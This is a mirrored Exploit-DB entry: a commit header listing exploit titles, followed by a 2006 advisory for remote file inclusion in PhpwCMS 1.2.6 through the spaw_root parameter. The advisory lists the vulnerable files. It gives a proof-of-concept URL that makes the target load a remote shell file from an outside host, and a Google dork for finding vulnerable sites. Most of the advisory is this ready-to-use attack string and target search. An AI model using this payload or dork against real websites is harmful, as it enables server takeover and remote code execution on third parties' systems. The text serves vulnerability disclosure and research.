exploit-db-mirror/platforms/php/webapps/2163.txt
Offensive Security f96ddba143 DB: 2016-09-02
2 new exploits

SAPID Blog beta 2 - (root_path) Remote File Inclusion
SAPID Gallery 1.0 - (root_path) Remote File Inclusion
SAPID Shop 1.2 - (root_path) Remote File Inclusion
SAPID Blog beta 2 - (root_path) Remote File Inclusion
SAPID Gallery 1.0 - (root_path) Remote File Inclusion
SAPID Shop 1.2 - (root_path) Remote File Inclusion

PHPCodeCabinet 0.5 - (Core.php) Remote File Inclusion

phNNTP 1.3 - (article-raw.php) Remote File Inclusion
Cwfm 0.9.1 - (Language) Remote File Inclusion
PHP 4.4.3 / 5.1.4 - (objIndex) Local Buffer Overflow PoC
Cwfm 0.9.1 - (Language) Remote File Inclusion
PHP 4.4.3 / 5.1.4 - (objIndex) Local Buffer Overflow PoC

PgMarket 2.2.3 - (CFG[libdir]) Remote File Inclusion

PHPMyRing 4.2.0 - (view_com.php) SQL Injection

SAPID CMS 1.2.3_rc3 - (rootpath) Remote Code Execution Exploit

phpwcms 1.1-RC4 - (spaw) Remote File Inclusion
Spaminator 1.7 - (page) Remote File Inclusion
Thatware 0.4.6 - (root_path) Remote File Inclusion
Spaminator 1.7 - (page) Remote File Inclusion
Thatware 0.4.6 - (root_path) Remote File Inclusion

phpPrintAnalyzer 1.2 - Remote File Inclusion

Wheatblog 1.1 - (session.php) Remote File Inclusion

phPay 2.02 - (nu_mail.inc.php) Remote mail() Injection Exploit

WordPress CYSTEME Finder Plugin 1.3 - Arbitrary File Dislcosure/Arbitrary File Upload
WordPress CYSTEME Finder Plugin 1.3 - Arbitrary File Disclosure/Arbitrary File Upload

FortiClient SSLVPN 5.4 - Credentials Disclosure
2016-09-02 05:08:35 +00:00

38 lines
790 B
Text
Executable file

PhpwCMS 1.2.6 <= Multiple Remote file inclusion vulnerabilities
Discovered by :
|\/| _ ._ _ _.._
| |(_)| (_|(_|| |
_|
Vuln In :
include $spaw_root.'class/lang.class.php';
Affected Files :
include/inc_ext/spaw/dialogs/table.php
include/inc_ext/spaw/dialogs/a.php
include/inc_ext/spaw/dialogs/colorpicker.php
include/inc_ext/spaw/dialogs/confirm.php
include/inc_ext/spaw/dialogs/img.php
include/inc_ext/spaw/dialogs/img_library.php
include/inc_ext/spaw/dialogs/td.php
Vendor Website: http://www.phpwcms.de/
PoC:
http://server/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://ehmorgan.net/shell.dat?
Google Dork:
inurl:"phpwcms/index.php?id="
Visit us :
www.ehmorgan.net
irc.gigachat.net
#Morgan
# milw0rm.com [2006-08-10]